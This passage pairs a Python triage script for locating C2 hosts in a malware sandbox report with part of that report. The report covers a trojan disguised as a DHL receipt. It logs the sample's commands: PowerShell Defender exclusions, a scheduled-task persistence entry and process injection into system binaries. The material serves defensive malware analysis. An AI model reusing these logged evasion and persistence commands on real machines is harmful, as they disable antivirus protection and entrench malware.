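def parse_sources(text):
    """'proc, dump, proc, dump, file.dr' -> [(name, dump_id or None), ...]."""
    entries = []
    for tok in (t.strip() for t in text.split(",")):
        if tok.endswith(".sdmp") and entries and entries[-1][1] is None:
            entries[-1] = (entries[-1][0], tok)   # dump belongs to the preceding process
        elif tok:
            entries.append((tok, None))           # process name or dropped file
    return entries


def parse_row(line):
    """One report row -> {'url': ..., 'sources': [...]}, or None if not a string row."""
    m = ROW_RE.match(line)
    if not m:
        return None
    return {"url": m.group("url"), "sources": parse_sources(m.group("sources"))}


def triage(lines):
    """Group URLs by host; record the sources that held them and whether any
    of those regions was RWX."""
    by_host = defaultdict(lambda: {"urls": set(), "sources": set(), "rwx": False})
    for row in filter(None, map(parse_row, lines)):
        host = urlsplit(row["url"]).hostname or row["url"]
        info = by_host[host]
        info["urls"].add(row["url"])
        for name, dump in row["sources"]:
            info["sources"].add(name)
            if dump is not None and dump_protect(dump) == PAGE_EXECUTE_READWRITE:
                info["rwx"] = True
    return dict(by_host)


def candidate_c2(by_host):
    """Hosts seen in an RWX region with a URL that carries a path.

    Heuristic, not a FormBook signature: a bare domain in a read/write data
    region is weak evidence on its own (decoy lists live there too); a
    path-bearing URL inside executable memory of an injected process is the
    first thing to pivot on.
    """
    return sorted(
        host for host, info in by_host.items()
        if info["rwx"] and any(urlsplit(u).path not in ("", "/") for u in info["urls"])
    )


def loader_only_hosts(by_host, loader):
    """Hosts that appear only in the initial sample's own memory; in this report
    those are font-vendor URLs from embedded font metadata, not payload config."""
    return {host for host, info in by_host.items() if info["sources"] == {loader}}


if __name__ == "__main__":
    hosts = triage(SAMPLE_LINES)
    print("candidate C2:", candidate_c2(hosts))
    print("loader-only:", sorted(loader_only_hosts(hosts, "DHL AWB Receipt_pdf.bat.exe")))
    for host, info in sorted(hosts.items()):
        print(f"{host:35} rwx={info['rwx']!s:5} sources={sorted(info['sources'])}")
```

Feed it the full report export (one row per line) to get the host table for the whole listing. On the six embedded rows it flags www.spacewalker.app, the only host whose URL carries a path and that sits in a 0x40 region of CLaoxM16clnn.exe, puts www.sakkal.com in the loader-only bucket, and leaves the /binding URLs and the decoy-looking bare domains unflagged because they were only seen in read/write regions.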

                E-Banking Fraud

                Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0042C763 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017335C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01734340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01734650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01732E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01733010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01733090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_017339B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01733D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01733D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01735130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0196EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0176EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01947E54 appears 96 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0177F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01747E54 appears 99 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 016EB970 appears 262 times
                Source: DHL AWB Receipt_pdf.bat.exe | Static PE information: invalid certificate
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1841864099.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.1749282533.0000000000A42000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJifX.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1833996170.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1851655343.0000000005650000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.1854846621.0000000007840000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe | Binary or memory string: OriginalFilenameJifX.exe: vs DHL AWB Receipt_pdf.bat.exe
                Source: DHL AWB Receipt_pdf.bat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: DHL AWB Receipt_pdf.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: AYBPplggzXaXav.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@16/10
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMutant created: \Sessions\1\BaseNamedObjects\XUThKrnbANz
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp99C5.tmpJump to behavior
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL AWB Receipt_pdf.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: EhStorAuthn.exe, 00000013.00000002.4207261427.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2177984269.00000000029B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 54%
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: version.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: slc.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
